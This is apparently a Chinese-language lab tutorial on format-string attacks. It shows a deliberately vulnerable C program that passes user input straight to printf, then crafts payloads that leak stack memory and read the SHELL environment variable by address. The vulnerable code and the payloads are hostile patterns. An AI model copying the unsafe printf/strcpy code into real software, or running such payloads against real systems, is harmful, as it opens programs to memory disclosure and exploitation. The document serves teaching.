格式串攻击
漏洞目标代码:
//fmtstr.c #include<stdlib.h> int main(int argc,char *argv[]){ static int canary=0; char temp[2048]; strcpy(temp,argv[1]); printf(temp); printf("\n"); printf("Canary at 0x%08x=0x%08x\n",&canary,canary); }
可以看出,漏洞代码允许用户指定printf的格式串,可自行构造
[root@Lynx gray]# ./fmtstr "AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x"
AAAA bffffa1a 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a 41414141
一直增加%08x,直到出现414141,也就是AAAA所在的栈的位置
当把最后一个%08x换成%s后会出现“段错误”
主要是%s试图读取内存的位置,用该位置的数据作为指针,指向别处,此处指向地址41414141,超出内存范围,所以会报错,由此可知,只要把这个地方换成任意正确的地址,就可以读取出这里保存的数据内容,也就是把"AAAA"替换成合法的内存地址。
获得某一环境变量的指针的辅助程序代码
//getenv.c #include<stdlib.h> int main(int argc,char *argv[]) { char *addr; addr=getenv(argv[1]); printf("%s is located at %p\n",argv[1],addr); }
[root@Lynx gray]# ./getenv SHELL
SHELL is located at 0xbffffa8c
可以看到保存SHELL的位置信息了,想获得具体内容吗?
[root@Lynx gray]# ./fmtstr `printf "\x8c\xfa\xff\xbf"`" %08x %08x %08x %08x %08x %08x %08x %08x %08x %s" bffffa1c 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a /bin/bash
其中"/bin/bash"就是"0xbffffa8c"这个地址的内容,获得了SHELL环境变量的内容。
----------------
Lynx
The quieter you become,the more you are able to hear.